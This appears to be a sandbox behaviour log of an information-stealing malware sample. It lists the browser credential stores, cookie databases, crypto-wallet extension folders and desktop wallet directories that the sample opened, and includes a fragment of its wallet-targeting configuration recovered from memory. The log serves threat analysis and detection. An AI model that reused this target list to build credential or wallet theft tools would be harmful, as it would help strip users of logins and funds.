                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe, Directory queried: C:\Users\user\Documents\AIXACVYBSB
